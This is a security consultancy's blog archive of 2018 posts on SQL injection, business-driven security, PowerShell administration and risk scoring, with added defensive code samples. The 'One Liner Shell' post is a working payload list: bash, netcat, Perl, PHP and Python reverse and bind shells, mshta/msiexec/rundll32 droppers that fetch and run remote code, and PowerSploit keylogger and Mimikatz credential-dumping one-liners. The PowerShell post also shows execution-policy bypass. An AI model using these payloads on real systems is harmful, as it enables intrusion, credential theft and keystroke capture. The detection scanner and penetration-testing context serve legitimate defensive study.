Monday 20 August 2018

OWASP A1-INJECTION


SQL INJECTION
SQL injection, also known as SQLi, is a common attack vector that uses malicious SQL code to manipulate a backend database and access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists or private customer details.
Fig1.1: SQL injection
Types of SQL injection
  • Error-based SQL injection
  • Union-based SQL injection
  • Blind SQL injection
    • Boolean-based blind SQLi
    • Time-based blind SQLi
SQL Injection scenario
Imagine a big company that keeps all its records on paper in a big room full of filing cabinets. In order to retrieve or change files, someone fills in a simple fill-in-the-blanks form, and that form is then sent to a clerk who follows the instructions on it.
For example:
Retrieve the billing records from start date _ _ _ to end date _ _ _ where the customer is _ _ _
Normally this would become something like this:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Billy Joe Bob
But in the hands of an unscrupulous person, maybe this form could be used for other purposes.
For example:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also retrieve the credit card numbers for all customers
By pretending that their name also includes other commands, they can hijack the form; if the clerk has not been trained to handle this sort of thing, they may simply execute the instructions without thinking and hand over all of the credit card information.
Or, alternately:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also add $100,000 to Robert Mensas’ account balance
This has similarly dangerous potential.
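The clerk scenario above as an added example, not code from the original post: the same billing-records lookup built by string concatenation (the form whose blanks become part of the instructions) next to a parameterised version, run against a constructed in-memory SQLite table with made-up customer names.

```python
import sqlite3

# Constructed sample data standing in for the billing-records cabinet.
BILLING_ROWS = [
    ("Billy Joe Bob", "2011-03-01", 120.50),
    ("Billy Joe Bob", "2011-09-15", 75.00),
    ("Robert Mensas", "2011-06-10", 300.00),
    ("Jane Roe", "2011-11-02", 42.00),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE billing (customer TEXT, billed_on TEXT, amount REAL)")
    conn.executemany("INSERT INTO billing VALUES (?, ?, ?)", BILLING_ROWS)
    return conn


def vulnerable_lookup(conn, customer, start, end):
    # The fill-in-the-blanks form built by string concatenation: whatever the
    # caller types is spliced into the SQL text, so the database ("the clerk")
    # cannot tell data from instructions.
    sql = (
        "SELECT customer, billed_on, amount FROM billing WHERE billed_on BETWEEN '"
        + start + "' AND '" + end + "' AND customer = '" + customer + "'"
    )
    return conn.execute(sql).fetchall()


def safe_lookup(conn, customer, start, end):
    # Parameterised query: the SQL text is fixed and the values travel
    # separately, so user input is only ever compared, never executed.
    sql = (
        "SELECT customer, billed_on, amount FROM billing "
        "WHERE billed_on BETWEEN ? AND ? AND customer = ?"
    )
    return conn.execute(sql, (start, end, customer)).fetchall()


def demo():
    """Row counts for an honest name and for the scenario's 'my name also
    includes other instructions' input, against both lookups."""
    conn = make_db()
    honest = "Billy Joe Bob"
    # Constructed hostile input: closes the quoted name and appends a condition
    # that is true for every row, the SQL form of "... and also retrieve
    # everything".
    hostile = "Billy Joe Bob' OR '1'='1"
    period = ("2011-01-01", "2011-12-31")
    return {
        "vulnerable_honest": len(vulnerable_lookup(conn, honest, *period)),
        "vulnerable_hostile": len(vulnerable_lookup(conn, hostile, *period)),
        "safe_honest": len(safe_lookup(conn, honest, *period)),
        "safe_hostile": len(safe_lookup(conn, hostile, *period)),
    }


if __name__ == "__main__":
    print(demo())
```

The concatenated query returns every customer's rows for the hostile input, while the parameterised one returns nothing because no customer literally has that name.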
SQL injection Architecture View
Fig1.2: SQL injection Architecture View
Impact of SQL injection
  • The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
  • When calculating the potential cost of an SQLi, it is important to consider the loss of customer trust should personal information such as phone numbers, addresses and credit card details be stolen.
  • While this vector can be used to attack any SQL database, websites are the most frequent targets.

Friday 17 August 2018

From Tech to Business-Driven Security


INTRODUCTION:

In today's digital world, IT security strategy must be transformed into a business-driven security strategy; otherwise vital digital transformation projects risk failing and becoming irrelevant to the organisation's business model.

TRANSFORMATION TO BUSINESS-DRIVEN SECURITY:

Information security practitioners, such as the security analysts and consultants of an organisation, should look at information security from a business perspective so that risk management is enforced properly and the data and assets most important to the organisation are protected from loss when a threat materialises.
To enforce a business-driven model of information security in an organisation, it is essential to understand and assess the organisation's risks in real time, and to mitigate them by having a skilled incident management team determine incidents conclusively. In short, it is more critical to have risk management in the organisation than a regular threat management team.
To create a compelling business-driven security model, an organisation must identify all of its assets, where they are located, and which of them are most vulnerable to threats and attacks; this helps it categorise its holdings for effective incident and risk management and for the mitigation of threats.

WHY A BUSINESS-DRIVEN SECURITY MODEL: ITS IMPORTANCE:

The need for business-driven security arises mainly from evolving threats across many aspects of technology, including the latest trends such as the Internet of Things (IoT), Artificial Intelligence (AI) and Machine Learning. As these new technologies evolve, the attack vectors against them evolve every day as well.
For example, IoT devices may have vulnerabilities at the firmware and application level which an attacker can exploit to take control of the device, gradually increasing the threat to the owning organisation.
Another primary reason for the business-driven security model is the "Gap of Grief". The Gap of Grief is a concept used to refer to the void in understanding of how security vulnerabilities can cause financial and reputational loss in an organisation. A significant part of this problem is that CISOs and other information security staff, such as penetration testers and consultants, fail to translate the challenges and risks found while assessing a threat into business terms. In cyber-security terms, the gap of grief is caused by not being able to report security issues effectively to the appropriate people at the right time.
Consider an example scenario: the CEO tours television and radio studios in a bid to dispel negative press and to assure the public that their data is safe with the company. This often backfires when it becomes apparent that the CEO has very little knowledge of the company's cyber-security operations, let alone how the breach occurred or how many customers were affected. This causes problems for the organisation, and the gap occurs.

ASPECTS OF A BUSINESS-DRIVEN MODEL:

The key element of the business-driven security model is to focus more on detecting and assessing threats than on protection alone, since protection is a complicated job to carry out. There should then be a valid defence strategy specifically for all the assets and their vulnerabilities, and this defence strategy should have definite cost-to-benefit values assigned.
Another aspect of the business-driven security model is that it should include the required skilled people, processes and technology (tools and services) for carrying out the risk management process.
Organisations need to find the security gaps between the current security level of their applications and infrastructure and the ideal security level they want to reach for effective risk management. This gap analysis is one of the key aspects of creating a business-driven security model for the organisation, and it helps security staff work on patching the gaps and vulnerabilities effectively.
Management should come up with a proper ranking of all their assets and applications based on the key value of each asset. It will then be easy for security staff to carry out gap analysis on a regular basis according to the risk ratings of assets and applications.

CONCLUSION:

The business-driven security model is more useful for an organisation, not just regarding cost but also regarding proper assessment of threats and risk. If implemented in the correct way, it will become an essential security model that helps security people mitigate threats and security breaches. Through a business-driven approach, BriskInfosec productively orchestrates business-driven security in a more agile and secure way. Since it relies heavily on the organisation's risk levels, it will help any organisation save a lot of the money and time that it was spending on incident and threat management.

Just talk to us and hire us to create business-driven security solutions for your organization.

AUTHOR :

Dawood Ansar
Security Engineer
Briskinfosec Technology and Consulting Pvt Ltd
Find me @https://www.linkedin.com/in/dawood-ansar-29403213b/

Monday 30 July 2018

ONE LINER SHELL

One Liner Shell draws attention to the different types of shells and droppers, which play an important role during penetration testing. These one-liners can be used for gaining access to a system, and red teamers use them during their pentests. A shell is a small piece of code or program used to gain command execution on a specific device. There are two types of shells:
  1. Reverse Shell
  2. Bind Shell

REVERSE SHELL

A reverse shell is a type of shell in which the victim machine connects back to the attacker's machine. The attacker's machine runs a listener on a specific port, which receives the connection once command or code execution has been performed on the victim.

BIND SHELL

A bind shell is a type of shell in which a communication port, or listener, is created on the victim machine and waits for the attacker to connect.
I was impressed by a tool, so I decided to write this blog. Tool link: https://github.com/D4Vinci/One-Lin3r. To use these shells in your real-time scenario, you need to fill in the IP address and the port number.
We will be discussing reverse shells and droppers for the Windows and Linux platforms.
  1. WINDOWS PAYLOADS
    1. Microsoft's SyncAppvPublishingServer
    2. WinInstaller_dropper
    3. Win_Remote_Management
    4. Execute C# files
    5. mshta hta
    6. netcat bind shell
    7. netcat reverse shell
    8. rundll32 dropper
    9. escalate services
    10. Key logger
    11. meterpreter shell
    12. mimikatz passwds
    13. Socket reverse
  2. LINUX PAYLOADS
    1. bash reverse
    2. netcat bind
    3. piped reverse
    4. netcat reverse
    5. sockets reverse perl
    6. socket reverse php

WINDOWS PAYLOADS

Here are some commands for shells on the Windows platform. We need to focus on the payload part, and if you are willing to edit the payload, go for it.

MICROSOFT’S SYNCAPPVPUBLISHINGSERVER

The Sync-AppvPublishingServer cmdlet initiates the Microsoft Application Virtualization (App-V) publishing refresh operation in the context of the current user. The publishing refresh connects to all servers added on the client and exposes new App-V packages and their respective extension points to the user. This one-liner uses SyncAppvPublishingServer to download and execute a PowerShell file.
Type = Dropper
Payload = SyncAppvPublishingServer.exe "n;((New-ObjectNet.WebClient).DownloadString('{mention the url of the payload}') | IEX

WININSTALLER_DROPPER

Windows Installer is a software component and application programming interface (API) of Microsoft Windows used for the installation, maintenance and removal of software. Passing an MSI file URL to the Windows Installer will download and execute the payload.
Type = Dropper
Payload = msiexec /i {mention the msi file URL here}

WIN_REMOTE_MANAGEMENT

Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. Windows Remote Management provides the ability to remotely execute WMI commands.
Type = Execute
Payload = winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="{your_command_here}"}

EXECUTE C# FILES

Uses the .NET compiler to compile a C# payload locally so that it can then be executed.
Type = Execute

Payload = C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe {your_cs_file_here}

MSHTA HTA

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). This one-liner uses the mshta command to download and execute your HTA file.
Type = Dropper

Payload = mshta {your hta file url}

NETCAT BIND SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. This one-liner uses the netcat tool to set up a bind shell.
Type = bind shell

Payload = nc -nv 4444 -e cmd.exe

NETCAT REVERSE SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. This one-liner uses the netcat tool to establish a reverse shell.
Type = Reverse
Payload = nc -nv {ip} {port} -e cmd.exe

RUNDLL32 DROPPER

The rundll32.exe process is responsible for running DLLs and placing their libraries in memory. This one-liner uses rundll32.exe to download and execute a PowerShell file.
Type = Dropper
Payload = rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('{your}');"

ESCALATE SERVICES

This is a PowerShell script from PowerTools, which the author attributes to the PowerShell Empire project. It is used for privilege escalation: it searches for vulnerable service privilege opportunities using the PowerUp script from PowerTools.
Type = Escalation
Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

KEY LOGGER

Here a PowerShell script is used to retrieve keystrokes. It uses a script from PowerSploit to log keystrokes to C:\Users\Public\key.log.
Type = Local
 Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1');Get-Keystrokes -LogPath C:\Users\Public\key.log

METERPRETER SHELL

Metasploit Meterpreter reverse HTTPS shell using a PowerShell script from PowerSploit.
Type = Reverse
Payload = Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost {ip} -Lport {port} -Force

MIMIKATZ PASSWORDS

Grabbing passwords from memory using the Invoke-Mimikatz script from PowerSploit.
Payload = Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

SOCKET REVERSE

A Python socket that connects back and executes the received data with subprocess.
Type = reverse

Payload = python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call("cmd");'

LINUX PAYLOADS

BASH REVERSE

Interactive shell via bash's built-in /dev/tcp.
Type = Reverse
Payload = bash -i >& /dev/tcp/{ip}/{port} 0>&1

NETCAT BIND

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. This one-liner uses the netcat tool to set up a bind shell.
Type = bind
Payload = nc -lvp 4444 -e /bin/sh

NETCAT REVERSE

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Establish a reverse connection with netcat.
Type = Reverse
Payload = nc -e /bin/sh {ip} {port}

PIPED REVERSE

Uses a tool that exists on most systems; the output of the commands is piped back.
Type = Reverse
Payload = exec 5<>/dev/tcp/{ip}/{port} && cat <&5 | while read line; do $line 2>&5 >&5; done

SOCKETS REVERSE PERL

Uses Perl sockets; the output of your commands is piped back.
Type = reverse

Payload = perl -e 'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

SOCKET REVERSE PHP

Uses PHP sockets & exec to create a reverse shell.
Type = reverse
Payload = php -r '$sock=fsockopen("{ip}",{port});exec("/bin/sh -i <&3 >&3 2>&3");'

CONCLUSION

In today's world, shells are becoming very popular and are growing in number. Attackers mostly prefer to hack or compromise a system using a shell because shells are very flexible when it comes to modifying the code. Major cyber-attacks are performed using reverse shells, so users need to be very careful when handling any tools or files. Before executing a tool or a file, scan it for malware (you can use online scanners such as https://www.virustotal.com/#/home/upload or https://nodistribute.com/).
Be prepared and be safe
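Added here as a defender-side example, not code from the post or from the One-Lin3r project: a small Python scanner that flags process command lines showing the download-and-execute patterns behind the one-liners above (IEX with DownloadString, mshta/msiexec/rundll32 given a URL or javascript: handler, netcat bound to a shell, /dev/tcp redirection). The log lines are constructed with RFC 5737 test addresses and a .invalid host, and are not real telemetry.

```python
import re

# Detection rules for the download-and-execute and shell one-liners above.
# Each pattern describes the technique (a remote fetch handed to an
# interpreter, a living-off-the-land binary given a URL, netcat bound to a
# shell), not one URL, port or host, so it survives trivial re-hosting.
CRADLE_RULES = [
    ("ps_download_cradle", re.compile(
        r"(IEX|Invoke-Expression)\b.*DownloadString\s*\("
        r"|DownloadString\s*\(.*\)\s*\|\s*IEX\b", re.I)),
    ("mshta_remote_hta", re.compile(r"\bmshta(\.exe)?\s+['\"]?https?://", re.I)),
    ("rundll32_javascript", re.compile(r"\brundll32(\.exe)?\s+['\"]?javascript:", re.I)),
    ("msiexec_remote_package", re.compile(r"\bmsiexec(\.exe)?\s+/i\s+['\"]?https?://", re.I)),
    ("appv_publishing_cradle", re.compile(r"\bSyncAppvPublishingServer(\.exe)?\s+[\"']?\s*n;", re.I)),
    ("netcat_exec_shell", re.compile(r"\bnc(\.exe)?\b.*\s-e\s+(cmd(\.exe)?|/bin/(ba)?sh)\b", re.I)),
    ("bash_dev_tcp_shell", re.compile(r"/dev/tcp/[\w.]+/\d+", re.I)),
]

# Constructed process-creation command lines (Windows 4688 / Sysmon event 1
# style, auditd style for the bash line); lines 1, 4 and 9 are benign
# look-alikes that a good rule must not flag.
SAMPLE_LOG = [
    r"powershell.exe -File C:\Scripts\nightly-backup.ps1",
    r"powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')",
    r"mshta.exe http://198.51.100.7/launch.hta",
    r"msiexec.exe /i C:\Installers\agent.msi /qn",
    r"msiexec.exe /i http://198.51.100.7/agent.msi",
    r'rundll32.exe javascript:"..\mshtml,RunHTMLApplication";<rest redacted>',
    r"nc.exe -nv 198.51.100.7 4444 -e cmd.exe",
    r"bash -i >& /dev/tcp/198.51.100.7/4444 0>&1",
    r"powershell.exe -c (New-Object Net.WebClient).DownloadFile('https://updates.example.invalid/agent.zip', 'C:\Temp\agent.zip')",
]


def classify(command_line):
    """Names of every rule the command line trips; empty list when none do."""
    return [name for name, pattern in CRADLE_RULES if pattern.search(command_line)]


def scan(lines):
    """[(1-based line number, [rule names])] for every line matching a rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        names = classify(line)
        if names:
            hits.append((number, names))
    return hits


if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(names)}")
```

A plain DownloadFile to disk (line 9) is deliberately not flagged; the rules key on the in-memory execution step, which is what separates a cradle from an ordinary download.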

AUTHOR

Venkatesh C.S
Security Engineer
Briskinfosec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

Wednesday 18 July 2018

SECURITY TASKS USING POWERSHELL


PowerShell is an advanced admin tool for the Windows operating system. End users with advanced knowledge, or those who have worked with an older version of Windows, may be familiar with the command prompt, through which you can run commands and scripts. PowerShell is similar but a lot more advanced in terms of functionality.
This blog gives you some advanced functions for configuration management and automated tasks. PowerShell includes both a scripting language and a command-line shell. It is built on the .NET Framework. It also offers the Integrated Scripting Environment (ISE), which gives you a GUI in which you can do all your scripting.
We will see how effectively PowerShell can be used for security-related tasks.

CONTENTS

  1. Understanding Execution Policy
  2. Overriding Execution Policy
  3. Listing NTFS Permissions
  4. Clone NTFS Permissions
  5. Adding Permissions
  6. Removing Permissions
  7. Checking Administrator Privileges

UNDERSTANDING EXECUTION POLICY

Execution policy lets a user determine which PowerShell scripts are allowed to run on the computer. Four different execution policies are available in PowerShell.
They are:
  • Restricted – no scripts can run; only interactive mode can be used.
  • AllSigned – only scripts signed by a trusted publisher can run.
  • RemoteSigned – scripts downloaded from the internet must be signed by a trusted publisher before they run.
  • Unrestricted – there is no restriction on running any PowerShell script.

This command shows your current execution policy.
PS C:\Users\proxy_000> Get-ExecutionPolicy
Restricted
End users should use RemoteSigned. It allows the user to run local scripts, but it does not allow scripts from outside the network or scripts downloaded from the internet.
Professional scripters can use "Bypass", which allows you to run any script regardless of location.
Here is a command to change the execution policy for your user account.
PS C:\Users\proxy_000> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

PS C:\Users\proxy_000> Get-ExecutionPolicy
Bypass
PS C:\Users\proxy_000>

OVERRIDING EXECUTION POLICY

Execution policy is not a security boundary that protects you from attackers; it merely acts as a seat belt. There are many other ways to override the execution policy and execute scripts or commands, for example by piping the script text into a new PowerShell process:
PS C:\Users\proxy_000> Get-Content 'c:\evilscript.ps1' -Raw | powershell.exe -noprofile -

LISTING NTFS PERMISSIONS

To view NTFS permissions for folders and files, use Get-Acl. At first it won't show you the actual permissions, but you can make them visible with this:
PS C:\Users\proxy_000> Get-Acl -path $env:windir | Select-Object -ExpandProperty Access

CLONE NTFS PERMISSIONS

NTFS access permissions are complicated and tricky. To quickly assign NTFS permissions to a new folder, you can simply clone the permissions from another folder that you know has the correct permissions applied.
$OriginalPath = "$env:temp\sample"
New-Item -Path $OriginalPath -ItemType Directory
To assign the correct permissions to the "proxy" folder manually, select it in Explorer:
Explorer.exe "/Select,$OriginalPath"
Right-click the proxy folder, choose Properties, then click the Security tab and add the security permissions you need to apply.
When your prototype folder is correctly configured, use this code to read its security information:
$sddl = (Get-Acl $OriginalPath).Sddl
From this point on, you don't need your prototype folder anymore; it was only required to create the SDDL definition string.
$newpath = "$env:temp\NewFolder"
md $newpath
$sd = Get-Acl -Path $newpath
$sd.SetSecurityDescriptorSddlForm($sddl)
Set-Acl -Path $newpath -Aclobject $sd

ADDING PERMISSIONS

To add a new permission to an existing security descriptor, first create an appropriate AccessRule object and configure it.
This script adds a new FileSystemAccessRule to the security descriptor of a file, granting read and write access to proxydomain\proxyaccount.
Make sure you adjust both the user account and the filename before you test the code:
$colRights = [System.Security.AccessControl.FileSystemRights]'Read, Write'
$InheritanceFlag = [System.Security.AccessControl.InheritanceFlags]::None
$PropagationFlag = [System.Security.AccessControl.PropagationFlags]::None
$objType = [System.Security.AccessControl.AccessControlType]::Allow
$objUser = New-Object System.Security.Principal.NTAccount('proxydomain\proxyaccount')
$objACE = New-Object System.Security.AccessControl.FileSystemAccessRule `
($objUser, $colRights, $InheritanceFlag, $PropagationFlag, $objType)
# get original SD
$catACL = Get-Acl 'C:\proxy\pr0xy.txt'
# add permission
$catACL.AddAccessRule($objACE)
# write back the appended SD
Set-Acl 'C:\proxy\pr0xy.txt' $catACL

REMOVING PERMISSIONS

To remove a permission from a security descriptor, get the ACL entries, pick the ones to delete, and write back the changed security descriptor.
$catACL = Get-Acl c:\proxy\pr0xy.txt
$unwanted = $catACL.Access |
Where-Object { $_.IdentityReference.Value -eq 'proxydomain\proxyaccount' }
$unwanted | ForEach-Object { $null = $catACL.RemoveAccessRule($_) }
Set-Acl -Path c:\proxy\pr0xy.txt -AclObject $catACL

CHECKING ADMINISTRATOR PRIVILEGES

There are many ways to find out if a script is running elevated. Here's a straightforward approach that uses whoami.exe (works with Win7/Server 2008 R2 or better):
(whoami.exe /all | Select-String S-1-16-12288) -ne $null
If you do not have whoami.exe, or if you are looking for a more integrated way, you can use a line that is a little longer but identifies admin status directly, without calling an external program:
(New-Object System.Security.Principal.WindowsPrincipal([System.Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)

CONCLUSION :

As discussed in this blog, PowerShell is an advanced admin tool capable of performing the tasks mentioned above. By executing these tasks, an admin can save a lot of time and make it harder for attackers to get into the system.
Briskinfosec offers periodic system hardening solutions to bring down the risk level in the organization; our constructive and customized solution will help protect the organization from serious threats.

AUTHOR

Venkatesh C.S
Security Engineer
Briskinfosec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/
Related Blogs:
  1. Two Phases of Powershell - Offensive and Defensive
  2. How to use Powershell as Handy like Shell Script?

Thursday 5 July 2018

RISK MANAGEMENT: HOW TO CALCULATE RISK?

INTRODUCTION :

Risk assessment and risk management are done by calculating severity and likelihood. Severity is judged by the level of the disaster and the impact it will have on the future of the organisation. Likelihood is judged by how probable it is that the risk will affect the organisation. The risk is calculated by analysing how the impact occurred and how it can be mitigated based on that calculation.
It is also a meaningful way to protect the organisation's business while at the same time complying with law and procedure. It helps to focus on the risks that matter to the organisation. In many scenarios, direct measures can be summed up to control risks, which means simple, cheap and effective measures to protect your most valuable assets.
In the risk assessment and risk management process, we are going to discuss how the process is done. The contents are below.
  1. Identify the hazards
  2. How the risk has happened
  3. Evaluate the risks
  4. Scale for the Likelihood
  5. Scale for the Consequence
  6. Treating the risk occurred
  7. Review Assessment
  8. Conclusion

STEP 1 – IDENTIFY THE HAZARDS:

To understand a risk, it is vital to understand the context in which it exists. The relationship between the organisation and the environment it functions in needs to be defined, so that the outline of the risk facing the organisation is evident.
  • Look at the location and the exposure of data;
  • Talk to the people concerned;
  • Check for any recent incidents.

STEP 2 – HOW THE RISK HAS HAPPENED:

This step identifies the likelihood and consequence of the risk occurring. The risk can be of any type, such as physical, ethical or financial.
Physical risks are those involving damage to organisational assets such as infrastructure equipment, injuries to employees, and also terrible weather conditions that affect routine services.
Ethical risks involve potential harm to the reputation and services of the organisation. Trust in the organisation is degraded when a data breach or leak has occurred.
Financial risks involve the loss of organisational assets, such as any theft or financial breach that occurred on the internet.

STEP 3 – EVALUATE THE RISKS:

Risk evaluation means analysing the likelihood and consequences of the identified threat and deciding which risk factors could potentially have an effect and need to be made a priority. The level of the risk is determined by the likelihood and the consequence of the impact.
The evaluation is done by comparing the impact of the risk found during the analysis process with the risk criteria previously established by the organisation.
The criteria for evaluating the risks are:

SCALE FOR THE LIKELIHOOD:

Severity   Description
5          Certain: will probably occur, often several times per year
4          Likely: likely to arise once per year
3          Possible: occurs once in a five-year period
2          Unlikely: disaster occurs once in 10+ years
1          Rare: barely occurs

SCALE FOR THE CONSEQUENCE:


Severity   Description
5          Catastrophic
4          Major
3          Moderate
2          Minor
1          Negligible

Calculation of risk priority
Risk = Likelihood × Impact

                         Impact
Likelihood   1          2          3          4          5
1            Very Low   Very Low   Low        Low        Medium
2            Very Low   Low        Medium     Medium     High
3            Low        Medium     Medium     High       High
4            Medium     Medium     High       High       Very High
5            High       High       Very High  Very High  Very High
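The matrix above in code, added here as an example rather than part of the original post: it rates constructed risk register entries with the page's table, sorts them by priority, and lists the cells where the rating depends on which of likelihood and impact is the larger, something the plain product Likelihood × Impact cannot express. The register entries are made up for the demo.

```python
# The likelihood x impact matrix from the table above: rows are likelihood
# 1..5, columns are impact 1..5.
RATING_MATRIX = {
    1: ["Very Low", "Very Low", "Low", "Low", "Medium"],
    2: ["Very Low", "Low", "Medium", "Medium", "High"],
    3: ["Low", "Medium", "Medium", "High", "High"],
    4: ["Medium", "Medium", "High", "High", "Very High"],
    5: ["High", "High", "Very High", "Very High", "Very High"],
}
RATING_ORDER = ["Very Low", "Low", "Medium", "High", "Very High"]


def check_scale(value, name):
    if value not in range(1, 6):
        raise ValueError(f"{name} must be an integer from 1 to 5, got {value!r}")


def risk_score(likelihood, impact):
    """Numeric priority, Risk = Likelihood * Impact, as written on the page."""
    check_scale(likelihood, "likelihood")
    check_scale(impact, "impact")
    return likelihood * impact


def risk_rating(likelihood, impact):
    """Qualitative rating read from the matrix."""
    check_scale(likelihood, "likelihood")
    check_scale(impact, "impact")
    return RATING_MATRIX[likelihood][impact - 1]


# Constructed risk register entries: (description, likelihood, impact).
SAMPLE_REGISTER = [
    ("Unpatched internet-facing web application", 4, 5),
    ("Laptop theft, disk encrypted", 3, 2),
    ("Flooding at the data centre", 1, 5),
    ("Phishing leading to credential loss", 5, 3),
    ("Shared printer outage", 4, 1),
]


def prioritise(register):
    """Descriptions ordered by matrix rating, then numeric score, highest first."""
    def key(entry):
        _, likelihood, impact = entry
        return (RATING_ORDER.index(risk_rating(likelihood, impact)),
                risk_score(likelihood, impact))
    return [entry[0] for entry in sorted(register, key=key, reverse=True)]


def asymmetric_cells():
    """(likelihood, impact) pairs whose rating changes when the two are swapped.
    The product is identical in both cells, so the matrix weights likelihood
    more heavily than the formula alone would."""
    return [(l, i) for l in range(1, 6) for i in range(1, 6)
            if l < i and risk_rating(l, i) != risk_rating(i, l)]


if __name__ == "__main__":
    for description in prioritise(SAMPLE_REGISTER):
        print(description)
    print("asymmetric cells:", asymmetric_cells())
```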

STEP 4 – TREATING THE RISK OCCURRED:

Risk treatment identifies the range of options for treating the risk, prepares the risk treatment plans and applies those plans. Options for treatment need to be proportionate to the significance of the risk.
According to the standard, various options exist:
  • Accepting the risk
  • Avoiding the risk
  • Reducing the risk
  • Transferring the risk
  • Retaining the risk
  • Financing the risk

STEP 5 – REVIEW ASSESSMENT

Reviewing is an ongoing and integral part of the risk management process. It is also an essential part of all business functions, which need to be monitored and treated. Monitoring and reviewing the risk makes sure that the information generated by the risk management process is logged, used and maintained.

CONCLUSION :

The risk assessment and management procedure above should be implemented by organisations to secure their work activities. However, some other methods contain activities where the work procedure covers employees undertaking work experience within the organisation. The risk management process needs to be implemented in the operations and governance of every organisation. However, there is no 'one size fits all' way of embedding risk management; the process must preferably be adapted to fit the size, complexity, industry competition and environmental uncertainty faced by the organisation.
Briskinfosec offers a comprehensive approach to managing risk and compliance in the organisation more effectively. Our customised solution meets the policies, procedures, technologies and competencies in several streams of work across the risk management categories of governance, process and technology.

AUTHOR :

Dharmesh B
Security Engineer
Briskinfosec Technology and Consulting Pvt Ltd.
https://www.linkedin.com/in/dharmeshbaskaran/